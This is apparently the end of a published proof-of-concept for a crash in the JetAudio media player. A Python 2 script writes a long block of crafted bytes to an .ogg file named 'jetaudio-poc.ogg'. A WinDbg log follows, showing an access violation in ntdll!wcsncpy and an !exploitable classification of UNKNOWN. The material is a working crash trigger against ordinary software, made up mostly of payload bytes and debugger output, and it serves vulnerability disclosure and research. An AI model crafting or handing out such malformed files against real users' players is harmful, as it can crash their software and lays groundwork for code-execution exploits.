x91xD7x37x1Bx28xE9xC4xA7x56xFBx31x89x2CxBAxBExF3x5BxCEx96x58xB8x2Ex2Dx5DxE4xDDxB0x38xDEx7Cx03xF0x5Ax8FxEAxF3xD3xE9x2Cx5Cx0Ex78x9CxEDxBCx7FxE2x9Bx58x45xEAx3CxA7xEAxE1xF2x4Dx1FxE8xC7x92x5BxDBxE1xE3xA9xF3xD6x90x4Cx7Cx73x90x9FxEEx54x70xDBxBBx4Cx2ExCCxF3xAFx75xAFxEAxB6xC9xCCxAAxACx5Ax1ExFFx9Fx9DxA9x38x24xDEx56x9Dx49xD7x9DxA2x1AxD5x30xBExFFx12x3Fx58xBExEFx9FxABx59x94x11x10x4CxADxB1xF3x5Ax88x4BxC4xEDx06x6Ax1CxE7x12x06xB5xC2x34x2Cx5ExCFx4CxE5x66x3Ex64x26xE5x94x28x6CxA7x66x9Dx9Ax31x8Cx60xCFx79x89xFBx8Bx6CxA8x6Ex31x2Dx2Fx94xA7x33x27x9Bx21x6DxAEx33xF9xECxEBxD8x08x21x21x7Cx96xDAxC5xB7x9Dx8Ax51x6FxCCxD5x7Ex53xB9xEAxD9x77x7Cx7BxCFx13xD1xB7xC8x77x8Fx14x43x45x9Fx85x7BxAAxA8x21xFAxA4xCFxE6x0DxF3xB2xE8x4Dx13x41x00xFExCBx95xC2x45xCDxBFx06xB1xFDx32x24x8Ax1CxCCx65x3Ax05xF9x9Fx01x1Cx24x8AxADxF5xBEx6FxC2xB1xCFxADxF6x59xADxB2xD1xC9x00x00x00x00x00x69x25x8Dx17x57x5Fx87xAFx65x6Bx46x39xE4xDCxAFx72xA7x6Bx27x21x75xD3xF2x96x07x13xBDxBBx1DxCExE7xA1xF1x8Ax1FxD9x8Ex3DxAFx18x8FxA7xC5xE9xCDx39x71xBAx96x35x07x3Bx3Dx6FxB9xBBx5Ex2Cx4Ex13x71xEEx9Dx77x93xFExD7x7Bx73x42xF4xAFx1Ax7Ex30x13x27xF3xFFx88x4BxEAxF1x96xF0x39x59x05xB7xB6xC9x7DxFExF1x9Cx33x6Ax82xE6xE4x27x34x59x49x81x2Cx98xFDx12xA1xDDxD5x79xCCx2Ex6Bx2Ax2Bx76x1Cx23x85x50x2FxD9xF4xDDxA7x5FxADx8Dx3AxA2xF8xDAx23x58x6Bx2Ex7CxB8xCAxFBxA5x4DxBAx86x6Bx77x7DxECxAFx4FxB3x87x83x73x38xBDx94xAFxD5xB9xF9xB6x71xDDx1Bx28x60xDCx67x47xCCxEDxC1x24x64xAFxD1xCExC3x94x00x6Ax1Ex3AxA7xA8xD6x7CxCDxE6x70x32x67x09xFExFDx52xE7x4ExB5xC8xE2x64x51x71x4Fx56xE2x5DxF3xE2x56x77xDBx68xB4x0Cx32x17x91x16xB3x75x5FxF4xDEx00x1Ax2Fx77xA6xD3x9Fx9Fx52xECx25xA3xD3x23xE3x0BxD6x8Dx64xC2x50xA1x43x85xA1xDEx84x1Cx18xD9x16x38x00x36x9Ax0Dx40x0ExE6x3Fx03x92x1BxC9xFAx3AxB5x45x44x0DxE6x3Fx07xC2x44xAAxFDx67x1Dx79xD1xFAx63x4Dx62x76xF3xF2xD1x38x1Cx67x77x5Bx37x4Fx9Ex71x61xCCxC7xCEx8Cx58xCExE7x43xC2xDExB6x59xA3xE5xCAx34x3Dx17x00x00x00x00x00xA6x0Dx6Ex36xFAxCFxACx72x63x0FxBAxDBxCEx33xB5x5AxCEx3Fx99x57x7BxA8xBBx38x5Fx3AxBCx69x9Ax93x63xEBx6Fx59x7Cx57xBExF6xAEx97xF6xD7xBFx27x1Dx79x3Cx8CxD2x67xD6xF3x35xB8xE0xFExF1x7AxF1xF5xEAx73xEExF5xFBxD1xEEx5CxE2x93xC7x5Dx45x9Dx5DxD7x8AxB2x81xDDx9Bx86xDAx4BxD5xD6x00xB5x09x8Fx2Bx4Ex7Bx20x4Bx78xADx35xB9xD5xD3xD5xE7x4Bx9Bx9ExF3x25xAEx47xEAxA8xE0xB1xDFx8Fx1Ax6Dx92x8FxB0x3ExFFxC1x8CxE3x6FxA2x08x0Ax1FxFCx55x1Ex0Dx5FxD9xAAx8BxCAxCAxCAx4Ex9Ax66xF3x4Bx24xE7x26x14x63x0Dx87x81xE7x57x7Dx55xCFx9Dx99xD5xF1x35x69x2AxEBxF5x7Dx4Ex36x5Dx59x2Ax86x1AxB6x6Ax5Dx5BxF0x9Ax6Cx5BxE7xA3xAAxBDx1Cx9Fx54x0Dx1Bx20xADx86xDDxEBx7Dx9Ex2Cx24xAAx18xB5xC0xE4x93xB9xC9x65x22x90x29x73x4Bx8DxBEx2DxA6x23x8Bx9DxF0xA6xA4xA6x7Dx57xA7x7DxBCx5Bx08x0Bx02x6Cx49x36x72xE8x40x86x77xCBx7Fx0DxFFx2ExBFxCBxB6x90x02x51x53x0Fx15xE3xC9x50x41x15xB4x72x4Bx36xE2xA1x46xC7x46xBDxB5xDAx94x33xA8xEDx60xF8x01xCCx24x20x00xB8xDBx07x98xEDxEFxDBx22x81xC3xFExF2xFCxBAx14xFBx1DxCFx06xD7xE3xB8xFCx3Dx6FxD0xDExD0x61xFEx1CxAFxB9x72xE3xEDxC2xA2xB8xF6x6Ex5Ex1AxF8xF0xB5x61xFCxD1x06xDCx8Ax05x35xE6xA5x26x07xA9xE2x52x8ExFFx84xBAx6ExFEx00xDBx2CxC8xECx89x01xC0x83x25xC0xF4xA5xD3x70xFCxDFx9CxB9xEBx85x25xCAx3DxF1xE1x8Ax6ExEBxEBx2FxFCx64x53xC6x7Ax36xE5x9BxE7xBDxE9x9Cx67xF2xF2xB8x79x79x70x72xEFx75xAEx07x69x89x6Ex7FxF9x51xE5xA4xDFx02x00xACx5Ex23xBFx41xCExDDx99xDAx8Dx3Cx9Dx87xFAxD6xB1x7DxD7xA7x75xDBxACxE5x04xE9xB0x1BxC7x0Dx3Cx55x6Dx67xDFx9Ax9FxEFxBFx74x36x77x23x1FxEBxB5xF7xEAx9Dx6AxAEx9Bx6FxD5xDDxB7x65xAFxF7x97x16x23xDFxD4xC3xA5x73xFBx1Fx14x79xFCxE2x95xBFxB0xD7xA8xC1x92x65x3BxDBx3Dx1FxF3x45x00xC4x76x75x39xCCxD4xF4x20xD4x3BxE0x23xA6xD4x24xFCx03xACxFBx82x8AxE7xDBx93x00xFDx1AxC0xB0xDEx9Bx2Fx5Cx47x3Fx3Dx8FxF1xFFx86x5Dx6ExBEx7Ex8Dx17x5Fx99xD7xF2x3Ax18xACx63xD2xFDx1Dx1Cx3Bx4BxA9xFExA2x6Ax4Fx1ExFFx8CxEExD6x48xAAxA2x47xE7xDFxBCx2CxB8xF5xA4x03x9Ax9Ax0DxE1x1CxF4x3Fx07xC5x44x12x5Ex68xB6x00x52xE0xBFx01x23x4Cx24x91xFBx03x00xE4x6BxF1xE1xECxD1xD9xECx26xA2xDFx04xE7xC9x49x9Ex74xCAx03xCCxFDx38xF6xAAxA0xA5x1Bx9Ex8Cx31x55x19x00x00xC6x44x12x21x22x76x1BxDCx9ExBFxD3x47x0Dx39xE5xE5xEBxB3xB8xF4xF5x4BxBFxD2x99xEExD3x71x8FxA6xE1xB8x3Dx1Bx0Dx4Ax69x8Ax97xB6xEBx82xB1x62x17x35xBDx99x1BxA0x59xD8xB4x96x30x5Ax83xB3x67x88xCExB5xD3xB9x57x35x86x46x13x9DxEDxE8x59xBAxEBxBEx5Ax5Ax74xD2xBFx2Fx2Bx66x2BxCFxF1x7Dx41x7CxCEx9BxC6x2FxD5x59xB3x85x7Ax34xA3xFDx9ExD8x1ExE9xB5x8ExC6x76x40x3Bx1DxAExC7xE5x25xDFx7ExF6x62x5BxE0xA0xA6xBBx67x49xA2x7DxA3x8Bx0Dx30xFFxFBxFEx9Bx83xEAx99x02x4DxD4x26x92xBAx78xC9x17xADx79xBFx58x50xCEx1Cx9Bx2ExCFx6Bx91xA8x17xD7xABx9AxDExCCx28x93x33xEFx8DxA9xBBxDEx4AxBCx75x4AxDEx52xE7x49x3Fx62x26xF8xCCx46xB5x49xA0xE1xD7x79x89x28xFAx12x9BxCEx8Dx48x98x35xBBxF3xFExEAx9Ex36x3Dx9BxD9xC9x34xD6xDDx0DxB0xBBxA6x99x5Cx69xD8x7DxC9xDFx19x47x20x23x61xD9x46x16xE8x46xC6xD8xC2x13x73x8Dx6FxF8xFEx76x5AxF8xF9x77x77xADx8Bx37x73x32x95xD5x11x38x70x7Fx60xD9x60x1Cx5AxC2x0AxE4x3FxC2x96x1DxD0x00x0Ex98x15xC0xF0x1ExC7x82xDEx07xD3x85x7Cx48x2FxF0xC4x31xADxC4xD1x36x40x21x08x7ExDBx45x20x07xF9xAFx81xF2x22x59x5BxEFx96xC5x18xECxBFx06xC2x46x12xFCxBDxFExB4x57x62x2Fx7Cx03x67x94xB0xCFx39x6Bx6BxA3x32x2Dx75x61x00x00x00x00x80xC9xFBxD3x63x26xEAxE7xC7xB7x5Fx5FxA7x06x1Bx93x7Bx0Dx87xB3x8DxC9x91xB3xDDx5Bx75x1DxB7x9Bx7Ex65xA2xDAx3Bx48x5Ax5Ex27x9AxB5x95x37xBBxABxF2x97xC7x07x85x26xE7x68xD5x74xCExC9xB6x4BxE5xF1xBAx0Fx44x48xB8x27xD4xDDxA9x3CxB2xEEx55x4FxDAx6CxFCxCAxDExCFxB0x32x9Fx28xD8xE1x97xBFxB4x2BxCFx53x35xE7x92x1CxBBx39xFAxE5xE5xF8x99x07xDCx1Bx77xBAxA9x0Ex89xCExC2xD9xF7x6FxE7xC1x43x47x56x9Ex99x9Dx86x86x9Fx7AxB4x6FxB9x6Fx49x40x29x87xABxAFx6Ex5AxF5x44x53x71xF5xF4x94xEFxE6xF9x0Fx31xE7x7DxE3x55xAAxF1xD8x84x76x35x67x32x6Ex4Fx96x93xA5xCEx8Cx47x91x14x9Fx35x7Dx0CxEFxC7xD6x90xECx7AxBDx7Bx8Cx72x98xEExBBx78x3Dx4ExD7xCCx54xDDxC5x5Ex46x9Ex8AxFAx2DxB9xE8xE9x5Dx95xBDx4DxA8x9Dx73x66x21x2BxD7x76xC2x74xB5xF7xDCxBDx9Fx29x8Ex71x63xFFx5Bx12x9Bx76x3Dx61xF8xB6xBCx35x71x34x33xBFxFFx35x7FxFEx2Cx05xB6x04x18x02xFFx0BxDFxC2xE0x47x96x83x50x8Ax58xC2xD0x37xD3x10xC3x14x51x15x45x01x1Ex7CxA5xAEx06xF3x9Fx05xC2x40xAAxFDx6Fx56x9Ax18x93xFDxE7x4Cx62xD8x48xD6xB7xDAxF4x2CxACx63x8Fx4Ex37x38x3Bx55x30xDAx9Cx35x5Ax6Ex15x23xC7xCEx00x00x00x00x00xE9x98x31x45xEFx87xEFx67xE5xD9x7Ax7BxE5x60xBDxB2x79x98xCCxE2xECxEAx6Bx97xD9xC5xEAx14x2Bx4Dx87x31x7Ex30x7BxBCxC7xC5xC2x7Ex5Ax31x7FxFDxB7xE9xD1xA7x2Fx35x3Cx2ExE8x28xA3xAFx33x1Fx31xDEx38x13x3Bx7Fx82xBEx23x9Dx3CxBFx08x3AxBFx1Ex26xA9xDDx7BxD4x0Dx3Fx1Cx3AxEBx86xCAxF2x4Dx48x71xE7xD2xFEx1Fx7BxACx25x55x22x97xC6xBFxFBxA1x2Bx67xE3xEFxCCxACx2FxBBx2Ax35xEAxC2xF8xE5xE9xDEx69x7Ex9Dx70xA2xA2x71x57xC2x6CxC2xDFxE2xEBx39xC9x87xECxD2x5Ex45x1Dx53x5FxEExBFx3Cx66x1Bx83xB5x5Dx43x41xA9xD9xFBx22x7FxBDx70x73x25xF4xFAxFExCAxE8x88xEDx73x2ExB9x9Cx64xA7xB3x61x89x7BxDFx11x44x52xDFx7AxDCx92xECx7CxA2x2Bx8Fx92x5Cx9BxCEx21x1FxC8xCCx15xEFx53xB0x5BxE5x51x5Fx18x72x0Fx89x7Fx69x59x10x58x36xF8x58x15x11x6Dx96x8ExDBxEFxCDx38xC6xA7xEFxE7xFEx68x61x61x26x5Ex15x11x95xC7xA6x29x02xA6x8Ax20x2AxC6x91x88xBEx6Dx99x68xF8x2FxB0x1Cx38xB0x6Cx09x05x00xBExABx85x2Ex47xC8xFFx0Cx22xEDx55x91x28xF2xADx16x53x17xF8xCFx19x30x90x78xABx93x33x37xFDxFBxB9xDFx25x5Cx5Ax01xDBx9CxFBx29xA0xDCx67xABx24x13xD2x77x06x00x00x00x00xD8xC9x3Cx93x47x63xF7x34xFExCFxCCx36xDExF0x6BxEFxE1x64xC2x28x91xE3xC1x69x0ExC5x2Bx2Dx39xB7xADxEBx6ExB6x66x64xD7x2Fx96xA7xCBx3AxFDxB5xF3xFDxD5x43xF5xB0x8DxBDxA9xFEx31xA3xFBxAFx0ExB4x8Ax60xC6x5Cx1Ax5DxC7xC1xDCx72x65x22x0Bx7CxC4xDEx77x96x9FxADxC9xD3x33xDBxF9x1Fx3Dx8Fx9Cx49xA7xE7xF5xBBx15xCFxBBx93xF3x2Cx6DxF3x6Fx8Cx35x97xFCx85xFBxCEx1CxAExE1x92xD4xE3xF1x3Bx6CxACxD9xB3xC2xDDxDDx25x4Ex37x8BxC4x38x86xFBxBExEFx6BxEBx83x59xEFxF9x15xE8x61xAAx9Ax66xB7x5ExB6x2AxC9x5ExFCx29x31x4Dx49x6Fx9Fx48xA8x74x1DxE5xE4xEBx3Fx97x23xB8x17x6Cx7ExCAx3Fx5CxAAxA4xA7x3Cx96xBDxF8xFEx74x7FxF0xB7xA9x3Dx6Dx4DxEFx7DxFFx5Cx75x8Cx2Ex7Bx36x61xB5x30x50x11xF0xCBx14x64x2Dx59x3Dx9CxA1x7ExEEx1ExCFx90x39x4Fx6BxD3x1Ax26x2BxACxF6x16x2Ax26x7AxF3xB6xF5xCDx4BxB0x6Fx4Ex4Bx56xECx3Fx72x88x25x00x59x92xC1x96xF4x81xE5x2DxD3xDBx67x4Bx72x53x55xCCxDFx31xC4xB0xD7x7Bx72x33xD4x5FxE4xF0xAFxCFx0Ex6Dx49x78x00xBExABx85x22x46xFDxBFx41xC6x56x99x53xEDx67xB5x24x4Cx71xFDx6Fx00x03xA9xFEx97xC1xB0x76x02xA3x8ExD4x29xA0xDAx53xADx72x34x7Cx30x00x8Cx30x00x00x20x72x31x5CxFBx63x1BxE5xA9x53xFBx75x73x54x97xDDx6DxB7x36x39x36xF5x0BxF1xAEx04x0AxDExF4x91x78xC9x51xAFxF1x13x6BxF2x95x0FxDBx7Bx9Fx8CxFDxDFx79xF9xE7x0Fx07xD9x94xCDxEBx94xBAxFDxC7xE4xBAxF6xE7xC1x3Cx72xAFx8Fx8Bx33x1Ex74x72x8Bx6CxC5x0Fx5DxEDx93x12x1AxFEx77xFFxFBxEAxE4xFDx6Dx57x33xA6x39xD4xA7xC1x65x65x73xE5x7Fx89xCDx66x53x03xFBx67x15x73x95x48xF7xA6xE7x79x3AxDDx1Cx2DxC7xCFx3CxCExF1xCCxCCxA9xC7xB9x23x1Dx39x7Cx43x64xA9x9Bx60xA1x7DxF5x4BxC6xDBx05x8CxFCxA5xACx7Bx3Cx7DxBExBExC9x5Bx91x71xB3x24xBBx8DxEFx3CxEAxDDx47x9ExC8xC9x30xF0x9BxA3xBDx16x91x48xA2x42x4Cx6Fx42xF5x99xCAxA2x12xBAxEExAEx7Dx5Ex53x9FxF5x01x93xC3xE0xEBxA0x15x98x33x6AxDDx4Fx67x67x53x00x01x00x55x00x00x00x00x00x00x55x0Bx00x00x04x00x00x00x16x3Dx35xFDx28x46xFFx4CxFFx52xFFx4ExFFx6AxFFx53x46x51x54x53x56x52x51x58x51x52x48x44x56x54x56x56x53x58x53x51x51x56x52x57x57x55x52x57x54x3Bx0Bx66x98xFBxBDxAFx64x85xD6x55x54xFEx7Bx37xE0x9Cx80xCFx62x57xBCx6Bx61xB2xCCxFFxCAxD2x2Fx63xD7x28x5Cx9ExC7x77xA1xDAxBCx9FxFDx42x13x9BxA7xA1xA6xAAxA2xE6x49xC5x14x11x51xC1x90xEFx31xB8xFBx58x50x70x00x10x48x00x02x3ExCCx65xB1x06xFDxCFx81x74x33x24x0D"
outfile = file("jetaudio-poc.ogg", 'wb')
outfile.write(data)
outfile.close()
print "Created Poc"

--------------------------------------------------------------------------------------------------------------------------

windbg result:

Microsoft (R) Windows Debugger Version 6.2.9200.16384 X86
Copyright (c) Microsoft Corporation. All rights reserved.

*** wait with pending attach
Symbol search path is: *** Invalid ***
****************************************************************************
* Symbol loading may be unreliable without a symbol search path. *
* Use .symfix to have the debugger choose a symbol path. *
* After setting your symbol path, use .reload to refresh symbol locations. *
****************************************************************************
Executable search path is:
ModLoad: 00400000 00b9b000 C:Program FilesJetAudioJetAudio.exe
ModLoad: 7c900000 7c9af000 C:WINDOWSsystem32
tdll.dll
ModLoad: 7c800000 7c8f6000 C:WINDOWSsystem32kernel32.dll
ModLoad: 10000000 1000f000 C:Program FilesJetAudioJetCfg.dll
ModLoad: 00ba0000 00c7d000 C:Program FilesJetAudiojdl_ximage.dll
ModLoad: 7e410000 7e4a1000 C:WINDOWSsystem32USER32.dll
ModLoad: 77f10000 77f59000 C:WINDOWSsystem32GDI32.dll
ModLoad: 78520000 785c3000
C:WINDOWSWinSxSx86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.30729.4974_x-ww_d889290fMSVCR90.dll
ModLoad: 78480000 7850e000
C:WINDOWSWinSxSx86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.30729.4974_x-ww_d889290fMSVCP90.dll
ModLoad: 003a0000 003e8000 C:Program FilesJetAudiojdl_exif.dll
ModLoad: 74ad0000 74ad8000 C:WINDOWSsystem32POWRPROF.dll
ModLoad: 77dd0000 77e6b000 C:WINDOWSsystem32ADVAPI32.dll
ModLoad: 77e70000 77f02000 C:WINDOWSsystem32RPCRT4.dll
ModLoad: 77fe0000 77ff1000 C:WINDOWSsystem32Secur32.dll
ModLoad: 77c10000 77c68000 C:WINDOWSsystem32msvcrt.dll
ModLoad: 77f60000 77fd6000 C:WINDOWSsystem32SHLWAPI.dll
ModLoad: 789e0000 78d81000
C:WINDOWSWinSxSx86_Microsoft.VC90.MFC_1fc8b3b9a1e18e3b_9.0.30729.4974_x-ww_a96f9c14mfc90u.dll
ModLoad: 773d0000 774d3000
C:WINDOWSWinSxSX86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.5512_x-ww_35d4ce83COMCTL32.dll
ModLoad: 76380000 76385000 C:WINDOWSsystem32MSIMG32.dll
ModLoad: 7c9c0000 7d1d7000 C:WINDOWSsystem32SHELL32.dll
ModLoad: 774e0000 7761d000 C:WINDOWSsystem32ole32.dll
ModLoad: 77120000 771ab000 C:WINDOWSsystem32OLEAUT32.dll
ModLoad: 76b40000 76b6d000 C:WINDOWSsystem32WINMM.dll
ModLoad: 771b0000 7725a000 C:WINDOWSsystem32WININET.dll
ModLoad: 77a80000 77b15000 C:WINDOWSsystem32CRYPT32.dll
ModLoad: 77b20000 77b32000 C:WINDOWSsystem32MSASN1.dll
ModLoad: 77c00000 77c08000 C:WINDOWSsystem32VERSION.dll
ModLoad: 76390000 763ad000 C:WINDOWSsystem32IMM32.DLL
ModLoad: 629c0000 629c9000 C:WINDOWSsystem32LPK.DLL
ModLoad: 74d90000 74dfb000 C:WINDOWSsystem32USP10.dll
ModLoad: 5ad70000 5ada8000 C:WINDOWSsystem32UxTheme.dll
ModLoad: 5d360000 5d36d000
C:WINDOWSWinSxSx86_Microsoft.VC90.MFCLOC_1fc8b3b9a1e18e3b_9.0.30729.4974_x-ww_19f00fd4MFC90ENU.DLL
ModLoad: 013f0000 01457000 C:Program FilesJetAudioJetCrash.dll
ModLoad: 73000000 73026000 C:WINDOWSsystem32WINSPOOL.DRV
ModLoad: 02800000 028c1000 C:Program FilesJetAudiodbghelp.dll
ModLoad: 74720000 7476c000 C:WINDOWSsystem32MSCTF.dll
ModLoad: 732e0000 732e5000 C:WINDOWSsystem32RICHED32.DLL
ModLoad: 74e30000 74e9d000 C:WINDOWSsystem32RICHED20.dll
ModLoad: 755c0000 755ee000 C:WINDOWSsystem32msctfime.ime
ModLoad: 76780000 76789000 C:WINDOWSsystem32shfolder.dll
ModLoad: 01780000 0178b000 C:Program FilesJetAudioJFEFFB3D.DLL
ModLoad: 017b0000 017bb000 C:Program FilesJetAudioJFEFFBBE.DLL
ModLoad: 017e0000 017eb000 C:Program FilesJetAudioJFEFFDRC.DLL
ModLoad: 01810000 0181b000 C:Program FilesJetAudioJFEFFFX.DLL
ModLoad: 01960000 0196d000 C:Program FilesJetAudioJFEFFRVB.DLL
ModLoad: 01990000 0199b000 C:Program FilesJetAudioJFEFFWID.DLL
ModLoad: 019c0000 019cc000 C:Program FilesJetAudioJFEFFXB.DLL
ModLoad: 019f0000 019fe000 C:Program FilesJetAudioJFEFFEQ.DLL
ModLoad: 01aa0000 01b23000 C:Program FilesJetAudioJFEXRMC.DLL
ModLoad: 76c30000 76c5e000 C:WINDOWSsystem32WINTRUST.dll
ModLoad: 76c90000 76cb8000 C:WINDOWSsystem32IMAGEHLP.dll
ModLoad: 72d20000 72d29000 C:WINDOWSsystem32wdmaud.drv
ModLoad: 72d10000 72d18000 C:WINDOWSsystem32msacm32.drv
ModLoad: 77be0000 77bf5000 C:WINDOWSsystem32MSACM32.dll
ModLoad: 77bd0000 77bd7000 C:WINDOWSsystem32midimap.dll
ModLoad: 76f50000 76f58000 C:WINDOWSsystem32wtsapi32.dll
ModLoad: 76360000 76370000 C:WINDOWSsystem32WINSTA.dll
ModLoad: 5b860000 5b8b5000 C:WINDOWSsystem32NETAPI32.dll
ModLoad: 02370000 02387000 C:Program FilesJetAudioJXCDMan.dll
ModLoad: 028d0000 02b95000 C:WINDOWSsystem32xpsp2res.dll
ModLoad: 02610000 02618000 C:Program FilesInternet Download
Manageridmmkb.dll
ModLoad: 03280000 03288000 C:Program FilesJetAudiojdl_vorbisfile.dll
ModLoad: 03290000 03296000 C:Program FilesJetAudiojdl_ogg.dll
ModLoad: 03a80000 03c0c000 C:Program FilesJetAudiojdl_vorbis.dll
ModLoad: 031a0000 03230000 C:Program FilesJetAudioJXVidInfo.dll
ModLoad: 75a70000 75a91000 C:WINDOWSsystem32MSVFW32.dll
ModLoad: 71ad0000 71ad9000 C:WINDOWSsystem32wsock32.dll
ModLoad: 71ab0000 71ac7000 C:WINDOWSsystem32WS2_32.dll
ModLoad: 71aa0000 71aa8000 C:WINDOWSsystem32WS2HELP.dll
ModLoad: 76fd0000 7704f000 C:WINDOWSsystem32CLBCATQ.DLL
ModLoad: 77050000 77115000 C:WINDOWSsystem32COMRes.dll
ModLoad: 74810000 7497d000 C:WINDOWSsystem32quartz.dll
ModLoad: 73f10000 73f6c000 C:WINDOWSsystem32dsound.dll
ModLoad: 73ee0000 73ee4000 C:WINDOWSsystem32KsUser.dll
ModLoad: 7d790000 7d99b000 C:WINDOWSsystem32wmvcore.dll
ModLoad: 03dc0000 03e0f000 C:WINDOWSsystem32DRMClien.DLL
ModLoad: 736b0000 736b7000 C:WINDOWSsystem32msdmo.dll
ModLoad: 7e1e0000 7e282000 C:WINDOWSsystem32urlmon.dll
ModLoad: 59a10000 59a4c000 C:WINDOWSsystem32WMASF.DLL
ModLoad: 4b320000 4b349000 C:WINDOWSsystem32wmidx.dll
ModLoad: 75cf0000 75d81000 C:WINDOWSsystem32mlang.dll
ModLoad: 75f40000 75f51000 C:WINDOWSsystem32devenum.dll
ModLoad: 03f30000 03f90000 C:Program FilesCommon FilesCOWONJetOGM.ax
ModLoad: 03fe0000 0403b000 C:Program FilesCommon FilesCOWONJetAVI.ax
ModLoad: 04440000 044b1000 C:Program FilesCommon FilesCOWONJetMKV.ax
ModLoad: 045c0000 0465c000 C:Program FilesCommon FilesCOWONJetMP4.ax
ModLoad: 04790000 047f7000 C:Program FilesCommon FilesCOWONJetMPG.ax
ModLoad: 04930000 0498c000 C:Program FilesCommon FilesCOWONJetFLV.ax
ModLoad: 590b0000 590ce000 C:WINDOWSsystem32wmpasf.dll
ModLoad: 71b20000 71b32000 C:WINDOWSsystem32MPR.dll
ModLoad: 6bf50000 6bfcd000 C:WINDOWSsystem32dxmasf.dll
ModLoad: 57fd0000 57ff7000 C:WINDOWSsystem32mpg2splt.ax
ModLoad: 04ad0000 04c2b000 C:Program FilesCommon FilesCOWONJetMPAd.ax
(cd0.6cc): Break instruction exception - code 80000003 (first chance)
*** ERROR: Symbol file could not be found. Defaulted to export symbols for
C:WINDOWSsystem32
tdll.dll -
eax=7ffd9000 ebx=00000001 ecx=00000002 edx=00000003 esi=00000004
edi=00000005
eip=7c90120e esp=0332ffcc ebp=0332fff4 iopl=0 nv up ei pl zr na pe
nc
cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000
efl=00000246
ntdll!DbgBreakPoint:
7c90120e cc int 3
0:011> g
ModLoad: 03d10000 03d32000 C:Program FilesJetAudioJFAUDFP.DLL
ModLoad: 03d40000 03d52000 C:Program FilesJetAudioJFOGGRD.DLL
ModLoad: 03d80000 03d97000 C:Program FilesJetAudioJFWAVOUT.DLL
ModLoad: 03ed0000 03ed9000 C:Program FilesJetAudioJXOGGDec.dll
ModLoad: 03d10000 03da4000 C:Program FilesJetAudioJFDSPL.DLL
ModLoad: 77920000 77a13000 C:WINDOWSsystem32setupapi.dll
(cd0.244): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00002620 ebx=04c40000 ecx=7ffdf000 edx=04c40608 esi=04c3db60
edi=04c40180
eip=7c9106f7 esp=0012cb58 ebp=0012cb64 iopl=0 nv up ei ng nz na po
cy
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000
efl=00210283
ntdll!wcsncpy+0x198:
7c9106f7 f6460501 test byte ptr [esi+5],1
ds:0023:04c3db65=??
0:000> .load winext/msec.dll
0:000> !exploitable

!exploitable 1.6.0.0
*** ERROR: Symbol file could not be found. Defaulted to export symbols for
C:Program FilesCommon FilesCOWONJetMPAd.ax -
Exploitability Classification: UNKNOWN
Recommended Bug Title: Data from Faulting Address controls Branch Selection
starting at ntdll!wcsncpy+0x0000000000000198 (Hash=0x9a4f2dee.0x9c6d098e)

The data from the faulting address is later used to determine whether or
not a branch is taken.

 

TOP

Malware :

Exploits :